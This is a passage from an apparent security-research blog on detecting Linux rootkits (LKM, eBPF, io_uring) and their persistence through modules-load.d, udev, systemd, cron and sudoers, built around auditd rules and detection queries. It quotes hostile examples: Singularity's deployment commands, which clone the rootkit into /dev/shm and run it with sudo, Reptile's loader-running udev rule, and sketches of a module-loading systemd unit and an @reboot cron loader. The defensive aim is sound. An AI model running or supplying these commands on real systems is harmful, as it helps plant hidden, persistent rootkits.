auditd.data.syscall in (&quot;init_module&quot;, &quot;finit_module&quot;)
</code></pre>
<p>This strategy will allow detection of the kernel module loading, regardless of the utility being used for the loading event. In the example below, we see a true positive detection of the <a href="https://github.com/m0nad/Diamorphine">Diamorphine</a> rootkit.</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image2.png" alt="Figure 5: Telemetry example of detecting the Diamorphine load event via finit_module() syscall" title="Figure 5: Telemetry example of detecting the Diamorphine load event via finit_module() syscall." /></p>
<p>This pre-built rule is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/persistence_kernel_driver_load.toml">Kernel Driver Load</a></li>
</ul>
<p>Additional Linux detection engineering guidance through Auditd is presented in the <a href="https://www.elastic.co/security-labs/linux-detection-engineering-with-auditd">Linux detection engineering with Auditd research</a>.</p>
<h4>Out-of-tree and unsigned modules</h4>
<p>Another sign of a malicious LKM is the presence of the kernel “taint” flag. When the kernel detects that a module is loaded that is either not part of the official kernel tree, lacks a valid signature, or uses a non-permissive license, it marks the kernel as “tainted”. This is a built-in integrity mechanism that indicates the kernel is in a potentially untrusted state. An example of this is shown below, where the <code>reveng_rtkit</code> module is loaded:</p>
<pre><code class="language-shell">[ 2853.023215] reveng_rtkit: loading out-of-tree module taints kernel.
[ 2853.023219] reveng_rtkit: module license 'unspecified' taints kernel.
[ 2853.023220] Disabling lock debugging due to kernel taint
[ 2853.023297] reveng_rtkit: module verification failed: signature and/or required key missing - tainting kernel
</code></pre>
<p>The kernel identifies the module as out-of-tree, with an unspecified license, and missing cryptographic verification. This results in the kernel being marked tainted.</p>
<p>To detect this behavior, system and kernel logging must be parsed and ingested. Once kernel log telemetry is available, simple pattern matching or rule-based detection can flag these events. Out-of-tree module loading can be detected through:</p>
<pre><code class="language-sql">event.dataset:&quot;system.syslog&quot; and process.name:&quot;kernel&quot; and
message:&quot;loading out-of-tree module taints kernel.&quot;
</code></pre>
<p>And similar detection logic can be implemented to detect unsigned module loading:</p>
<pre><code class="language-sql">event.dataset:&quot;system.syslog&quot; and process.name:&quot;kernel&quot; and
message:&quot;module verification failed: signature and/or required key missing - tainting kernel&quot;
</code></pre>
<p>Using the detection logic above, we observed true positives in telemetry, attempting to load Singularity:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image17.png" alt="Figure 6: Telemetry example of a kernel taint upon the loading of Singularity" title="Figure 6: Telemetry example of a kernel taint upon the loading of Singularity." /></p>
<p>These pre-built rules are available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/persistence_tainted_kernel_module_load.toml">Tainted Kernel Module Load</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/183b337a01a2e3d6b5a2915887630ffb1df8d822/rules/linux/persistence_tainted_kernel_module_out_of_tree_load.toml">Tainted Out-Of-Tree Kernel Module Load</a></li>
</ul>
<p>The log entry will always show the module name that triggered the event, enabling easy triage. When the LKM is not present in the system during a manual check triggered by this alert, it may indicate that the LKM is hiding itself.</p>
<h4>Kill signals</h4>
<p>Many (open-source) rootkits leverage <code>kill</code> signals, specifically those in the higher, unassigned ranges (32+), as covert communication channels or triggers for malicious actions. For instance, a rootkit might intercept a specific high-numbered <code>kill</code> signal (e.g., <code>kill -64 &lt;pid&gt;</code>). Upon receiving this signal, the rootkit's payload could be configured to elevate privileges, execute commands, toggle hiding capabilities, or establish a backdoor.</p>
<p>To detect this, we can leverage Auditd and create a rule that collects all kill signals:</p>
<pre><code class="language-shell">-a exit,always -F arch=b64 -S kill -k kill_rule
</code></pre>
<p>The arguments passed to <code>kill()</code> are <code>kill(pid, sig)</code>. Auditd records syscall arguments as hexadecimal strings, so we can query <code>a1</code> (the signal) to flag any kill signal above 32.</p>
<pre><code class="language-sql">process where event.action == &quot;killed-pid&quot; and
auditd.data.syscall == &quot;kill&quot; and auditd.data.a1 in (
&quot;21&quot;, &quot;22&quot;, &quot;23&quot;, &quot;24&quot;, &quot;25&quot;, &quot;26&quot;, &quot;27&quot;, &quot;28&quot;, &quot;29&quot;, &quot;2a&quot;,
&quot;2b&quot;, &quot;2c&quot;, &quot;2d&quot;, &quot;2e&quot;, &quot;2f&quot;, &quot;30&quot;, &quot;31&quot;, &quot;32&quot;, &quot;33&quot;, &quot;34&quot;,
&quot;35&quot;, &quot;36&quot;, &quot;37&quot;, &quot;38&quot;, &quot;39&quot;, &quot;3a&quot;, &quot;3b&quot;, &quot;3c&quot;, &quot;3d&quot;, &quot;3e&quot;,
&quot;3f&quot;, &quot;40&quot;, &quot;41&quot;, &quot;42&quot;, &quot;43&quot;, &quot;44&quot;, &quot;45&quot;, &quot;46&quot;, &quot;47&quot;
)
</code></pre>
<p>Analyzing the <code>kill()</code> syscall for unusual signal values via Auditd presents a strong detection opportunity against rootkits that utilize these signals, as seen in techniques such as those employed by Diamorphine. The kill-related pre-built rules are available at:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/linux/defense_evasion_unsual_kill_signal.toml">Unusual Kill Signal</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/linux/defense_evasion_kill_command_executed.toml">Kill Command Execution</a></li>
</ul>
<h4>Segfaults</h4>
<p>Finally, it’s essential to recognize that kernel-space rootkits are inherently fragile. LKMs are typically compiled for a specific kernel version and configuration. An incorrectly resolved symbol or a misaligned memory write may trigger a segmentation fault. While these failures may not immediately expose the rootkit’s functionality, they provide strong forensic signals.</p>
<p>To detect this, raw syslog collection must be enabled. From there, writing a detection rule to flag segfault messages can help identify either malicious behavior or kernel instability, both of which warrant investigation:</p>
<pre><code class="language-sql">event.dataset:&quot;system.syslog&quot; and process.name:&quot;kernel&quot; and message:&quot;segfault&quot;
</code></pre>
<p>This detection rule is available out-of-the-box as <a href="https://www.elastic.co/docs/solutions/security/detect-and-alert/about-building-block-rules">a building block rule</a>:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules_building_block/execution_linux_segfault.toml">Segfault Detected</a></li>
</ul>
<p>Combining syscall-level module-loading visibility with kernel taint, out-of-tree messages, kill-signal detection, and segfault alerts lays the foundation for a layered strategy to detect LKM-based rootkits.</p>
<h3>eBPF rootkits</h3>
<p>eBPF rootkits exploit the legitimate functionality of the Linux kernel’s BPF subsystem. Programs can be dynamically loaded and attached using utilities like <code>bpftool</code> or via custom loaders that abuse the <code>bpf()</code> syscall.</p>
<p>Detecting eBPF-based rootkits requires visibility into both <code>bpf()</code> syscall activity and the use of sensitive eBPF helpers. Key indicators include:</p>
<ul>
<li><code>bpf(BPF_MAP_CREATE, ...)</code></li>
<li><code>bpf(BPF_MAP_LOOKUP_ELEM, ...)</code></li>
<li><code>bpf(BPF_MAP_UPDATE_ELEM, ...)</code></li>
<li><code>bpf(BPF_PROG_LOAD, ...)</code></li>
<li><code>bpf(BPF_PROG_ATTACH, ...)</code></li>
</ul>
<p>Leveraging Auditd, an audit rule can be created where the <code>a0</code> argument selects the specific <code>bpf()</code> commands of interest:</p>
<pre><code class="language-shell">-a always,exit -F arch=b64 -S bpf -F a0=0 -k bpf_map_create
-a always,exit -F arch=b64 -S bpf -F a0=1 -k bpf_map_lookup_elem
-a always,exit -F arch=b64 -S bpf -F a0=2 -k bpf_map_update_elem
-a always,exit -F arch=b64 -S bpf -F a0=5 -k bpf_prog_load
-a always,exit -F arch=b64 -S bpf -F a0=8 -k bpf_prog_attach
</code></pre>
<p>These must be tuned on a per-environment basis to ensure that benign programs (e.g., EDRs or other observability tools) that leverage eBPF do not generate noise. Another important signal is the use of eBPF helper functions.</p>
<h4>The bpf_probe_write_user helper function</h4>
<p>The <code>bpf_probe_write_user</code> helper allows kernel-space eBPF programs to write directly to userland memory. Although intended for debugging, this function can be abused by rootkits.</p>
<p>Detection remains challenging, but Linux kernels commonly log the use of sensitive helpers, such as <code>bpf_probe_write_user</code>. Monitoring for these entries offers a detection opportunity, requiring raw syslog collection and specific detection rules, such as the following:</p>
<pre><code class="language-sql">event.dataset:&quot;system.syslog&quot; and process.name:&quot;kernel&quot; and
message:&quot;bpf_probe_write_user&quot;
</code></pre>
<p>This rule will alert on any kernel log entry indicating the use of <code>bpf_probe_write_user</code>. While legitimate tools may occasionally invoke it, unexpected or frequent use, especially alongside suspicious process behavior, warrants investigation. Context, such as the eBPF program’s attachment point and the userland process involved, aids triage. This detection rule is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/linux/persistence_bpf_probe_write_user.toml">Suspicious Usage of bpf_probe_write_user Helper</a></li>
</ul>
<p>Below are a few obvious examples of true positives detected by this logic:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image20.png" alt="Figure 7: Telemetry example of bpf_probe_write_user function call via a malicious eBPF program" title="Figure 7: Telemetry example of bpf_probe_write_user function call via a malicious eBPF program." /></p>
<p>The rule triggers on <a href="https://github.com/eeriedusk/nysm">nysm</a> (a stealthy post-exploitation container) and <a href="https://github.com/krisnova/boopkit">boopkit</a> (a Linux eBPF backdoor).</p>
<h3>io_uring rootkits</h3>
<p><a href="https://www.armosec.io/blog/io_uring-rootkit-bypasses-linux-security/">ARMO research</a> (2025) introduced a new defense evasion technique that leverages <code>io_uring</code>, a Linux interface for asynchronous I/O, to reduce observable syscall activity and bypass standard telemetry. This technique is limited to kernel versions 5.1 and above and avoids using hooks. Although only recently adopted by rootkit developers, the tooling is under active development and remains relatively immature in its feature set. An example tool that leverages this technique is <a href="https://github.com/MatheuZSecurity/RingReaper">RingReaper</a>. Rootkits can batch file, network, and other I/O operations via <code>io_uring_enter()</code>. A code example is shown below.</p>
<pre><code class="language-c">struct io_uring_sqe *sqe = io_uring_get_sqe(&amp;ring);
io_uring_prep_read(sqe, fd, buf, size, offset);
io_uring_submit(&amp;ring);
</code></pre>
<p>These calls queue and submit a read request using <code>io_uring</code>, bypassing typical syscall telemetry paths.</p>
<p>Unlike syscall table hooking or <code>LD_PRELOAD</code>-based injection, <code>io_uring</code> is not a rootkit delivery mechanism itself but provides a stealthier means of interacting with the filesystem and devices post-compromise. While <code>io_uring</code> cannot directly execute binaries (due to the lack of <code>execve</code>-like capabilities), it enables malicious actions such as file creation, enumeration, and data exfiltration, while minimizing observability.</p>
<p>Detecting <code>io_uring</code>-based rootkits requires visibility into the syscalls that underpin their operation, such as <code>io_uring_setup()</code>, <code>io_uring_enter()</code>, and <code>io_uring_register()</code>.</p>
<p>While EDR solutions may struggle to capture the indirect effects of <code>io_uring</code>, Auditd can trace these syscalls directly. The following audit rule captures relevant events for analysis:</p>
<pre><code class="language-shell">-a always,exit -F arch=b64 -S io_uring_setup -S io_uring_enter -S io_uring_register -k io_uring
</code></pre>
<p>However, this only exposes the syscall usage itself, not the specific file or object being accessed. The real &quot;magic&quot; of <code>io_uring</code> occurs within userland libraries (e.g., <code>liburing</code>), making analysis of syscall arguments essential.</p>
<p>For example, monitoring <code>io_uring_enter()</code> with <code>to_submit &gt; 0</code> indicates that an I/O operation is being batched, while alternating calls with <code>min_complete &gt; 0</code> signals completion polling. Correlating with process attributes (e.g., UID=0, unusual paths such as <code>/dev/shm</code>, <code>/tmp</code>, or <code>tmpfs</code>-backed locations) enhances detection efficacy.</p>
<p>A practical method for tracing <code>io_uring</code> activity is via eBPF tracing tools such as <code>bpftrace</code>, targeting tracepoints such as <code>syscalls:sys_enter_io_uring_enter</code>. This allows analysts to monitor process behavior and active file descriptors during <code>io_uring</code> operations:</p>
<pre><code class="language-c">tracepoint:syscalls:sys_enter_io_uring_enter
{
    printf(&quot;\nPID %d (%s) called io_uring_enter with fd=%d, to_submit=%d, min_complete=%d, flags=%d\n&quot;,
        pid, comm, args-&gt;fd, args-&gt;to_submit, args-&gt;min_complete, args-&gt;flags);

    printf(&quot;Manually inspect with: ls -l /proc/%d/fd\n&quot;, pid);
}
</code></pre>
<p>To illustrate this, several techniques introduced by RingReaper were tested. Live tracing reveals the file descriptors in use, helping identify suspicious activity such as reading from <code>/run/utmp</code> to enumerate logged-in users:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image16.png" alt="Figure 8: RingReaper users' command" title="Figure 8: RingReaper users' command." /></p>
<p>The activity of writing to a file, in this example <code>/root/test</code>:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image1.png" alt="Figure 9: RingReaper put command" title="Figure 9: RingReaper put command." /></p>
<p>Or listing process information via <code>ps</code> by reading the <code>comm</code> contents for each active PID:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image6.png" alt="Figure 10: RingReaper ps command" title="Figure 10: RingReaper ps command." /></p>
<p>While syscall monitoring exposes <code>io_uring</code> usage, it does not directly reveal the nature of the I/O without additional correlation. <code>io_uring</code> is a relatively new technique and therefore still stealthy, but it has its limitations: it cannot directly execute code. Attackers may, however, abuse file writes (e.g., cron jobs, udev rules) to achieve delayed or indirect execution, as demonstrated by persistence techniques used by the Reptile and <a href="https://www.levelblue.com/blogs/spiderlabs-blog/unveiling-sedexp/">Sedexp</a> malware families.</p>
<h3>Rootkit persistence techniques</h3>
<p>Rootkits, whether in userland or kernel space, require some form of persistence to remain functional across reboots or user sessions. The methods vary depending on the type and privileges of the rootkit, but commonly involve abusing configuration files, service management, or system initialization scripts.</p>
<h4>Userland rootkits – environment variable persistence</h4>
<p>When using <code>LD_PRELOAD</code> to activate a userland rootkit, the behavior is not persistent by default. To achieve persistence, attackers may modify shell initialization files (e.g., <code>~/.bashrc</code>, <code>~/.zshrc</code>, or <code>/etc/profile</code>) to export environment variables such as <code>LD_PRELOAD</code> or <code>LD_LIBRARY_PATH</code>. These modifications ensure that every new shell session automatically inherits the environment required to activate the rootkit. Notably, these files exist for both user and root contexts. Therefore, even non-privileged users can introduce persistence that hijacks execution flow at their privilege level.</p>
<p>To detect this, a rule similar to the one displayed below can be used:</p>
<pre><code class="language-sql">file where event.action in (&quot;rename&quot;, &quot;creation&quot;) and file.path like (
  // system-wide configurations
  &quot;/etc/profile&quot;, &quot;/etc/profile.d/*&quot;, &quot;/etc/bash.bashrc&quot;,
  &quot;/etc/bash.bash_logout&quot;, &quot;/etc/zsh/*&quot;, &quot;/etc/csh.cshrc&quot;,
  &quot;/etc/csh.login&quot;, &quot;/etc/fish/config.fish&quot;, &quot;/etc/ksh.kshrc&quot;,

  // root and user configurations
  &quot;/home/*/.profile&quot;, &quot;/home/*/.bashrc&quot;, &quot;/home/*/.bash_login&quot;,
  &quot;/home/*/.bash_logout&quot;, &quot;/home/*/.bash_profile&quot;, &quot;/root/.profile&quot;,
  &quot;/root/.bashrc&quot;, &quot;/root/.bash_login&quot;, &quot;/root/.bash_logout&quot;,
  &quot;/root/.bash_profile&quot;, &quot;/root/.bash_aliases&quot;, &quot;/home/*/.bash_aliases&quot;,
  &quot;/home/*/.zprofile&quot;, &quot;/home/*/.zshrc&quot;, &quot;/root/.zprofile&quot;, &quot;/root/.zshrc&quot;,
  &quot;/home/*/.cshrc&quot;, &quot;/home/*/.login&quot;, &quot;/home/*/.logout&quot;, &quot;/root/.cshrc&quot;,
  &quot;/root/.login&quot;, &quot;/root/.logout&quot;, &quot;/home/*/.config/fish/config.fish&quot;,
  &quot;/root/.config/fish/config.fish&quot;, &quot;/home/*/.kshrc&quot;, &quot;/root/.kshrc&quot;
)
</code></pre>
<p>Depending on the environment, several of these shells may not be in use, and a more tailored detection rule may be created, focusing only on <code>bash</code> or <code>zsh</code>, for example. The full detection logic using Elastic Defend and <a href="https://www.elastic.co/docs/reference/integrations/fim">Elastic’s File Integrity Monitoring integration</a> can be found here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/linux/persistence_shell_configuration_modification.toml">Shell Configuration Creation</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/integrations/fim/persistence_suspicious_file_modifications.toml">Potential Persistence via File Modification</a></li>
</ul>
<p>For more information, a full breakdown of this persistence technique, including several other ways to detect its abuse, is presented in <a href="https://www.elastic.co/security-labs/primer-on-persistence-mechanisms#t1546004---event-triggered-execution-unix-shell-configuration-modification">Linux Detection Engineering - A primer on persistence mechanisms</a>.</p>
<h4>Userland rootkits – configuration-based persistence</h4>
<p>Modifying the <code>/etc/ld.so.preload</code>, <code>/etc/ld.so.conf</code>, or the <code>/etc/ld.so.conf.d/</code> configuration files allows rootkits to persist globally across users and sessions (more information on this persistence vector is available in <a href="https://www.elastic.co/security-labs/continuation-on-persistence-mechanisms#t1574006---hijack-execution-flow-dynamic-linker-hijacking">Linux Detection Engineering - A Continuation on Persistence Mechanisms</a>). Once written, the dynamic linker will continue injecting the malicious shared object unless these configurations are explicitly reverted. These methods are persistent by design. Detection strategies mirror those described in the previous section and rely on monitoring file creation or modification events in these paths.</p>
<h4>Kernel-space rootkits – LKM persistence</h4>
<p>Similar to userland rootkits, LKMs are not persistent by default. An attacker must explicitly configure the system to reload the malicious module on boot. This is typically achieved by leveraging legitimate kernel module loading mechanisms:</p>
<p><strong>Modules file: <code>modules</code></strong></p>
<p>This file lists kernel modules that should be loaded automatically during system startup. Adding a malicious module name here ensures that <code>modprobe</code> will load it upon boot. This file is located at <code>/etc/modules</code>.</p>
<p><strong>Configuration directory for <code>modprobe</code></strong></p>
<p>This directory contains configuration files for the <code>modprobe</code> utility. Attackers may use aliasing to disguise their rootkit or autoload it when a specific kernel event occurs (e.g., when a device is probed). These modprobe configuration files are located at <code>/etc/modprobe.d/</code>, <code>/run/modprobe.d/</code>, <code>/usr/local/lib/modprobe.d/</code>, <code>/usr/lib/modprobe.d/</code>, and <code>/lib/modprobe.d/</code>.</p>
<p><strong>Configure kernel modules to load at boot: <code>modules-load.d</code></strong></p>
<p>These configuration files specify which modules to load early in the boot process and are located at <code>/etc/modules-load.d/</code>, <code>/run/modules-load.d/</code>, <code>/usr/local/lib/modules-load.d/</code>, and <code>/usr/lib/modules-load.d/</code>.</p>
<p>To detect all of the persistence techniques listed above, a detection rule similar to the one below can be created:</p>
<pre><code class="language-sql">file where event.action in (&quot;rename&quot;, &quot;creation&quot;) and file.path like (
  &quot;/etc/modules&quot;,
  &quot;/etc/modprobe.d/*&quot;,
  &quot;/run/modprobe.d/*&quot;,
  &quot;/usr/local/lib/modprobe.d/*&quot;,
  &quot;/usr/lib/modprobe.d/*&quot;,
  &quot;/lib/modprobe.d/*&quot;,
  &quot;/etc/modules-load.d/*&quot;,
  &quot;/run/modules-load.d/*&quot;,
  &quot;/usr/local/lib/modules-load.d/*&quot;,
  &quot;/usr/lib/modules-load.d/*&quot;
)
</code></pre>
<p>A pre-built rule that combines all of the paths listed above into a single detection is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/linux/persistence_lkm_configuration_file_creation.toml">Loadable Kernel Module Configuration File Creation</a></li>
</ul>
<p>An example of a rootkit that automatically deploys persistence using this method is Singularity. Within its deployment, the following commands are executed:</p>
<pre><code class="language-shell">read -p &quot;Enter the module name (without .ko): &quot; MODULE_NAME
CONF_DIR=&quot;/etc/modules-load.d&quot;
mkdir -p &quot;$CONF_DIR&quot;
echo &quot;[*] Setting up persistence...&quot;
echo &quot;$MODULE_NAME&quot; &gt; &quot;$CONF_DIR/$MODULE_NAME.conf&quot;
</code></pre>
<p>By default, this means that <code>singularity.conf</code> will be created as a new entry under <code>/etc/modules-load.d/</code>. Looking at telemetry, we detect this technique simply by monitoring for new file creations:</p>
<p><img src="https://www.elastic.co/security-labs/assets/images/linux-rootkits-2-caught-in-the-act/image19.png" alt="Figure 11: Telemetry example of Singularity’s LKM persistence technique" title="Figure 11: Telemetry example of Singularity’s LKM persistence technique." /></p>
<p>These directories are also used for benign LKMs and will therefore be prone to false positives. Another persistence method involves using a trigger- or schedule-based technique to load the kernel module by executing the loader.</p>
<h4>Udev-based persistence – Reptile example</h4>
<p>A less common but powerful persistence method involves abusing udev, the Linux device manager that handles dynamic device events. Udev executes rule-based scripts when specific conditions are met. A full breakdown of this technique is presented in <a href="https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms">Linux Detection Engineering - A Sequel on Persistence Mechanisms</a>. The <a href="https://codeberg.org/hardenedvault/Reptile-vault-range/src/commit/01dc5e1300bf1ba364870c8f4781e085c3c463e9/scripts/rule">Reptile rootkit</a> demonstrates this technique by installing a malicious udev rule under <code>/etc/udev/rules.d/</code>:</p>
<pre><code class="language-shell">ACTION==&quot;add&quot;, ENV{MAJOR}==&quot;1&quot;, ENV{MINOR}==&quot;8&quot;, RUN+=&quot;/lib/udev/reptile&quot;
</code></pre>
<p>This rule was likely used as inspiration by the <a href="https://www.levelblue.com/blogs/spiderlabs-blog/unveiling-sedexp/">Sedexp</a> malware discovered by Levelblue. Here’s how the rule works:</p>
<ul>
<li><code>ACTION==&quot;add&quot;</code>: Triggers when a new device is added to the system.</li>
<li><code>ENV{MAJOR}==&quot;1&quot;</code>: Matches devices with major number “1”, typically memory-related devices such as <code>/dev/mem</code>, <code>/dev/null</code>, <code>/dev/zero</code>, and <code>/dev/random</code>.</li>
<li><code>ENV{MINOR}==&quot;8&quot;</code>: Further narrows the condition to <code>/dev/random</code>.</li>
<li><code>RUN+=&quot;/lib/udev/reptile&quot;</code>: Executes the Reptile loader binary when the above device is detected.</li>
</ul>
<p>This rule establishes persistence by triggering the execution of a loader binary whenever the <code>/dev/random</code> device is loaded. Because <code>/dev/random</code> is a widely used random number generator essential to numerous system applications and the boot process, this method is effective. Activation occurs only upon specific device events, and execution happens with root privileges through the <code>udev</code> daemon. To detect this technique, a detection rule similar to the one below can be created:</p>
<pre><code class="language-sql">file where event.action in (&quot;rename&quot;, &quot;creation&quot;) and file.extension == &quot;rules&quot; and file.path like (
  &quot;/lib/udev/*&quot;,
  &quot;/etc/udev/rules.d/*&quot;,
  &quot;/usr/lib/udev/rules.d/*&quot;,
  &quot;/run/udev/rules.d/*&quot;,
  &quot;/usr/local/lib/udev/rules.d/*&quot;
)
</code></pre>
<p>We cover the creation and modification of these files via the following pre-built rules:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/linux/persistence_udev_rule_creation.toml">Systemd-udevd Rule File Creation</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/integrations/fim/persistence_suspicious_file_modifications.toml">Potential Persistence via File Modification</a></li>
</ul>
<h4>General persistence mechanisms</h4>
<p>In addition to kernel module loading paths, attackers may rely on more generic Linux persistence methods to reload userland or kernel-space rootkits via the loader:</p>
<p><strong>Systemd</strong>: <a href="https://www.elastic.co/security-labs/primer-on-persistence-mechanisms">Create or append to a service/timer</a> under any systemd unit directory (e.g., <code>/etc/systemd/system/</code>) so that the loader is executed at boot.</p>
<pre><code class="language-sql">file where event.action in (&quot;rename&quot;, &quot;creation&quot;) and file.path like (
  &quot;/etc/systemd/system/*&quot;, &quot;/etc/systemd/user/*&quot;,
  &quot;/usr/local/lib/systemd/system/*&quot;, &quot;/lib/systemd/system/*&quot;,
  &quot;/usr/lib/systemd/system/*&quot;, &quot;/usr/lib/systemd/user/*&quot;,
  &quot;/home/*.config/systemd/user/*&quot;, &quot;/home/*.local/share/systemd/user/*&quot;,
  &quot;/root/.config/systemd/user/*&quot;, &quot;/root/.local/share/systemd/user/*&quot;
) and file.extension in (&quot;service&quot;, &quot;timer&quot;)
</code></pre>
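<p>For illustration, a minimal unit matching the query above might look like the following sketch. The unit name and module path are hypothetical, and the file is written to a stand-in directory rather than <code>/etc/systemd/system/</code> so the sketch does not require root:</p>

```shell
# Stand-in for /etc/systemd/system/ (hypothetical unit and module names).
UNIT_DIR=./demo_systemd
mkdir -p "$UNIT_DIR"

# An innocuous-looking oneshot service that re-inserts a kernel module at boot.
cat > "$UNIT_DIR/syshelper.service" <<'EOF'
[Unit]
Description=System helper

[Service]
Type=oneshot
ExecStart=/sbin/insmod /usr/lib/modules/helper.ko

[Install]
WantedBy=multi-user.target
EOF
```

<p>A real installer would follow this with <code>systemctl daemon-reload</code> and <code>systemctl enable syshelper.service</code>, both of which generate additional process telemetry.</p>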
<p><strong>Initialization scripts</strong>: <a href="https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms">Create or append to a malicious run-control</a> (<code>/etc/rc.local</code>), <a href="https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms">SysVinit</a> (<code>/etc/init.d/</code>), or <a href="https://www.elastic.co/security-labs/sequel-on-persistence-mechanisms">Upstart</a> (<code>/etc/init/</code>) script.</p>
<pre><code class="language-sql">file where event.action in (&quot;creation&quot;, &quot;rename&quot;) and
file.path like (
  &quot;/etc/init.d/*&quot;, &quot;/etc/init/*&quot;, &quot;/etc/rc.local&quot;, &quot;/etc/rc.common&quot;
)
</code></pre>
<p><strong>Cron jobs</strong>: <a href="https://www.elastic.co/security-labs/primer-on-persistence-mechanisms">Create or append to a cron job</a> that allows for repeated execution of a loader.</p>
<pre><code class="language-sql">file where event.action in (&quot;rename&quot;, &quot;creation&quot;) and
file.path like (
  &quot;/etc/cron.allow&quot;, &quot;/etc/cron.deny&quot;, &quot;/etc/cron.d/*&quot;,
  &quot;/etc/cron.hourly/*&quot;, &quot;/etc/cron.daily/*&quot;, &quot;/etc/cron.weekly/*&quot;,
  &quot;/etc/cron.monthly/*&quot;, &quot;/etc/crontab&quot;, &quot;/var/spool/cron/crontabs/*&quot;,
  &quot;/var/spool/anacron/*&quot;
)
</code></pre>
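<p>A cron-based loader entry that this rule would surface can be sketched as follows; the loader path is hypothetical, and the entry is appended to a stand-in file rather than the real <code>/etc/crontab</code>:</p>

```shell
# Stand-in for /etc/crontab (hypothetical hidden loader path).
CRON_FILE=./demo_crontab
# "@reboot" re-launches the loader every time the system boots.
echo '@reboot root /usr/local/bin/.loader' >> "$CRON_FILE"
```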
<p><strong>Sudoers</strong>: <a href="https://www.elastic.co/security-labs/primer-on-persistence-mechanisms">Create or append to a malicious sudoers configuration</a> as a backdoor.</p>
<pre><code class="language-sql">file where event.type in (&quot;creation&quot;, &quot;change&quot;) and
file.path like &quot;/etc/sudoers*&quot;
</code></pre>
<p>These methods are widely used, flexible, and often easier to detect using process lineage or file-modification telemetry.</p>
<p>The pre-built detection rules covering these persistence techniques are listed below:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/93d20b1233fc94aea8f4a80062bd1f59069fb0c5/rules/linux/persistence_systemd_service_creation.toml">Systemd Service Created</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/93d20b1233fc94aea8f4a80062bd1f59069fb0c5/rules/linux/persistence_systemd_scheduled_timer_created.toml">Systemd Timer Created</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/93d20b1233fc94aea8f4a80062bd1f59069fb0c5/rules/linux/persistence_init_d_file_creation.toml">System V Init Script Created</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/93d20b1233fc94aea8f4a80062bd1f59069fb0c5/rules/linux/persistence_rc_script_creation.toml">rc.local/rc.common File Creation</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/93d20b1233fc94aea8f4a80062bd1f59069fb0c5/rules/linux/persistence_cron_job_creation.toml">Cron Job Created or Modified</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/5d98a212fcb980a37ee6be2327f861e5af3ede41/rules/cross-platform/privilege_escalation_sudoers_file_mod.toml">Sudoers File Activity</a></li>
<li><a href="https://github.com/elastic/detection-rules/blob/e012e88342d89d6d7f28aac4a7c744ef96b16067/rules/integrations/fim/persistence_suspicious_file_modifications.toml">Potential Persistence via File Modification</a></li>
</ul>
<h3>Rootkit defense evasion techniques</h3>
<p>Although rootkits are, by definition, tools for defense evasion, many implement additional techniques to remain undetected during and after deployment. These methods are designed to avoid visibility in logs, evade endpoint detection agents, and interfere with common investigation workflows. The following section outlines key evasion techniques employed by modern Linux rootkits, categorized by their operational targets.</p>
<h4>Attempts to remain stealthy upon deployment</h4>
<p>Threat actors commonly favor execution tactics that leave minimal forensic traces. For example, a threat actor may store and execute payloads from the <code>/dev/shm</code> shared-memory directory: because it is a fully virtual file system, the payloads never touch disk. This frustrates forensic recovery but, from a behavioral detection engineering standpoint, is highly suspicious and uncommon.</p>
<p>As an example, Singularity’s author (while not an actual threat actor) suggests the following deployment method:</p>
<pre><code class="language-shell">cd /dev/shm
git clone https://github.com/MatheuZSecurity/Singularity
cd Singularity
sudo bash setup.sh
sudo bash scripts/x.sh
</code></pre>
<p>Several tripwires can be installed to detect this behavior with a near-zero false-positive rate, starting with the cloning of a GitHub repository into the <code>/dev/shm</code> directory.</p>
<pre><code class="language-sql">sequence by process.entity_id, host.id with maxspan=10s
  [process where event.type == &quot;start&quot; and event.action == &quot;exec&quot; and (
     (process.name == &quot;git&quot; and process.args == &quot;clone&quot;) or
     (
       process.name in (&quot;wget&quot;, &quot;curl&quot;) and
       process.command_line like~ &quot;*github*&quot;
     )
  )]
  [file where event.type == &quot;creation&quot; and
   file.path like (&quot;/tmp/*&quot;, &quot;/var/tmp/*&quot;, &quot;/dev/shm/*&quot;)]
</code></pre>
